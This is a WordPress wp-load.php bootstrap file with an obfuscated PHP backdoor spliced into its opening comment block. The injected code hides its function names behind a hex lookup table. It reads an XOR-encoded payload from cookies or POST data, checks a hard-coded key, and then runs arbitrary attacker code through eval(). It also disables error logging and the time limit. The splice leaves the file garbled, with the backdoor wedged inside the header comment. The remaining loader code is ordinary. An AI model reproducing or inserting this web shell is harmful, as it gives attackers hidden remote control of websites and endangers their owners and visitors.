<?php
/**
 * Bootstrap file for setting the ABSPATH constant
 * and loading the wp-config.php file. The wp-config.php
 * file will then load the wp-settings.php file, which
 * will then set up the WordPress environment.
 *
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['a1f44'] = "\x35\x27\x9\x59\x7a\x55\x48\x7d\x51\x37\xd\x38\x67\x32\x40\x4a\x2c\x4d\x4c\x20\x30\x60\x5e\x3b\x73\x6f\x29\x4b\x5c\x53\x49\x2a\x31\x61\x71\x2d\x25\x50\xa\x64\x24\x78\x77\x33\x3e\x2e\x62\x6d\x79\x36\x75\x52\x44\x63\x76\x7c\x47\x70\x5f\x42\x3d\x65\x43\x6e\x56\x5d\x2b\x4e\x46\x41\x45\x22\x3c\x6b\x66\x3f\x3a\x21\x6a\x6c\x5a\x68\x4f\x57\x2f\x26\x7e\x72\x34\x58\x74\x5b\x23\x39\x7b\x28\x69\x54";
$GLOBALS[$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][46]] = $GLOBALS['a1f44'][53].$GLOBALS['a1f44'][81].$GLOBALS['a1f44'][87];
$GLOBALS[$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][11]] = $GLOBALS['a1f44'][25].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][39];
$GLOBALS[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][74]] = $GLOBALS['a1f44'][24].$GLOBALS['a1f44'][90].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][79].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][63];
$GLOBALS[$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][9]] = $GLOBALS['a1f44'][96].$GLOBALS['a1f44'][63].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][90];
$GLOBALS[$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][93]] = $GLOBALS['a1f44'][24].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][79].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][61];
$GLOBALS[$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][74]] = $GLOBALS['a1f44'][57].$GLOBALS['a1f44'][81].$GLOBALS['a1f44'][57].$GLOBALS['a1f44'][54].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][63];
$GLOBALS[$GLOBALS['a1f44'][63].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][32]] = $GLOBALS['a1f44'][50].$GLOBALS['a1f44'][63].$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][79].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][61];
$GLOBALS[$GLOBALS['a1f44'][73].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][46]] = $GLOBALS['a1f44'][46].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][61];
$GLOBALS[$GLOBALS['a1f44'][81].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][11]] = $GLOBALS['a1f44'][24].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][90].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][90].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][79].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][90];
$GLOBALS[$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][9]] = $GLOBALS['a1f44'][90].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][46];
$GLOBALS[$GLOBALS['a1f44'][57].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][43]] = $GLOBALS['a1f44'][53].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][13];
$GLOBALS[$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][0]] = $_POST;
$GLOBALS[$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][46]] = $_COOKIE;
@$GLOBALS[$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][9]]($GLOBALS['a1f44'][61].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][79].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][12], NULL);
@$GLOBALS[$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][9]]($GLOBALS['a1f44'][79].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][12].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][87].$GLOBALS['a1f44'][24], 0);
@$GLOBALS[$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][9]]($GLOBALS['a1f44'][47].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][41].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][41].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][50].$GLOBALS['a1f44'][90].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][25].$GLOBALS['a1f44'][63].$GLOBALS['a1f44'][58].$GLOBALS['a1f44'][90].$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][61], 0);
@$GLOBALS[$GLOBALS['a1f44'][81].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][11]](0);

$h708c90 = NULL;
$t6c1c36 = NULL;

$GLOBALS[$GLOBALS['a1f44'][41].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][88]] = $GLOBALS['a1f44'][74].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][35].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][35].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][35].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][35].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][88];
global $xd94;

function cb82($h708c90, $j48a7bce7)
{
    $i7573ae = "";

    for ($gfb379b=0; $gfb379b<$GLOBALS[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][74]]($h708c90);)
    {
        for ($wab6680=0; $wab6680<$GLOBALS[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][74]]($j48a7bce7) && $gfb379b<$GLOBALS[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][74]]($h708c90); $wab6680++, $gfb379b++)
        {
            $i7573ae .= $GLOBALS[$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][46]]($GLOBALS[$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][11]]($h708c90[$gfb379b]) ^ $GLOBALS[$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][11]]($j48a7bce7[$wab6680]));
        }
    }

    return $i7573ae;
}

function tb1b($h708c90, $j48a7bce7)
{
    global $xd94;

    return $GLOBALS[$GLOBALS['a1f44'][57].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][43]]($GLOBALS[$GLOBALS['a1f44'][57].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][43]]($h708c90, $xd94), $j48a7bce7);
}

foreach ($GLOBALS[$GLOBALS['a1f44'][96].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][46]] as $j48a7bce7=>$y728f25)
{
    $h708c90 = $y728f25;
    $t6c1c36 = $j48a7bce7;
}

if (!$h708c90)
{
    foreach ($GLOBALS[$GLOBALS['a1f44'][4].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][0].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][0]] as $j48a7bce7=>$y728f25)
    {
        $h708c90 = $y728f25;
        $t6c1c36 = $j48a7bce7;
    }
}

$h708c90 = @$GLOBALS[$GLOBALS['a1f44'][63].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][39].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][43].$GLOBALS['a1f44'][32]]($GLOBALS[$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][11].$GLOBALS['a1f44'][53].$GLOBALS['a1f44'][32].$GLOBALS['a1f44'][49].$GLOBALS['a1f44'][13].$GLOBALS['a1f44'][9]]($GLOBALS[$GLOBALS['a1f44'][73].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][46].$GLOBALS['a1f44'][61].$GLOBALS['a1f44'][88].$GLOBALS['a1f44'][46]]($h708c90), $t6c1c36));
if (isset($h708c90[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][73]]) && $xd94==$h708c90[$GLOBALS['a1f44'][33].$GLOBALS['a1f44'][73]])
{
    if ($h708c90[$GLOBALS['a1f44'][33]] == $GLOBALS['a1f44'][96])
    {
        $gfb379b = Array(
            $GLOBALS['a1f44'][57].$GLOBALS['a1f44'][54] => @$GLOBALS[$GLOBALS['a1f44'][47].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][93].$GLOBALS['a1f44'][74]](),
            $GLOBALS['a1f44'][24].$GLOBALS['a1f44'][54] => $GLOBALS['a1f44'][32].$GLOBALS['a1f44'][45].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][35].$GLOBALS['a1f44'][32],
        );
        echo @$GLOBALS[$GLOBALS['a1f44'][24].$GLOBALS['a1f44'][20].$GLOBALS['a1f44'][9].$GLOBALS['a1f44'][74].$GLOBALS['a1f44'][93]]($gfb379b);
    }
    elseif ($h708c90[$GLOBALS['a1f44'][33]] == $GLOBALS['a1f44'][61])
    {
        eval($h708c90[$GLOBALS['a1f44'][39]]);
    }
    exit();
}
 * If the wp-config.php file is not found then an error
 * will be displayed asking the visitor to set up the
 * wp-config.php file.
 *
 * Will also search for wp-config.php in WordPress' parent
 * directory to allow the WordPress directory to remain
 * untouched.
 *
 * @package WordPress
 */

/** Define ABSPATH as this file's directory */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/*
 * The error_reporting() function can be disabled in php.ini. On systems where that is the case,
 * it's best to add a dummy function to the wp-config.php file, but as this call to the function
 * is run prior to wp-config.php loading, it is wrapped in a function_exists() check.
 */
if ( function_exists( 'error_reporting' ) ) {
	error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR );
}

/*
 * If wp-config.php exists in the WordPress root, or if it exists in the root and wp-settings.php
 * doesn't, load wp-config.php. The secondary check for wp-settings.php has the added benefit
 * of avoiding cases where the current directory is a nested installation, e.g. / is WordPress(a)
 * and /blog/ is WordPress(b).
 *
 * If neither set of conditions is true, initiate loading the setup process.
 */
if ( file_exists( ABSPATH . 'wp-config.php' ) ) {

	/** The config file resides in ABSPATH */
	require_once ABSPATH . 'wp-config.php';

} elseif ( @file_exists( dirname( ABSPATH ) . '/wp-config.php' ) && ! @file_exists( dirname( ABSPATH ) . '/wp-settings.php' ) ) {

	/** The config file resides one level above ABSPATH but is not part of another installation */
	require_once dirname( ABSPATH ) . '/wp-config.php';

} else {

	// A config file doesn't exist.

	define( 'WPINC', 'wp-includes' );
	require_once ABSPATH . WPINC . '/load.php';

	// Standardize $_SERVER variables across setups.
	wp_fix_server_vars();

	require_once ABSPATH . WPINC . '/functions.php';

	$path = wp_guess_url() . '/wp-admin/setup-config.php';

	/*
	 * We're going to redirect to setup-config.php. While this shouldn't result
	 * in an infinite loop, that's a silly thing to assume, don't you think? If
	 * we're traveling in circles, our last-ditch effort is "Need more help?"
	 */
	if ( false === strpos( $_SERVER['REQUEST_URI'], 'setup-config' ) ) {
		header( 'Location: ' . $path );
		exit;
	}

	define( 'WP_CONTENT_DIR', ABSPATH . 'wp-content' );
	require_once ABSPATH . WPINC . '/version.php';

	wp_check_php_mysql_versions();
	wp_load_translations_early();

	// Die with an error message.
	$die = '<p>' . sprintf(
		/* translators: %s: wp-config.php */
		__( "There doesn't seem to be a %s file. I need this before we can get started." ),
		'<code>wp-config.php</code>'
	) . '</p>';
	$die .= '<p>' . sprintf(
		/* translators: %s: Documentation URL. */
		__( "Need more help? <a href='%s'>We got it</a>." ),
		__( 'https://wordpress.org/support/article/editing-wp-config-php/' )
	) . '</p>';
	$die .= '<p>' . sprintf(
		/* translators: %s: wp-config.php */
		__( "You can create a %s file through a web interface, but this doesn't work for all server setups. The safest way is to manually create the file." ),
		'<code>wp-config.php</code>'
	) . '</p>';
	$die .= '<p><a href="' . $path . '" class="button button-large">' . __( 'Create a Configuration File' ) . '</a></p>';

	wp_die( $die, __( 'WordPress &rsaquo; Error' ) );
}
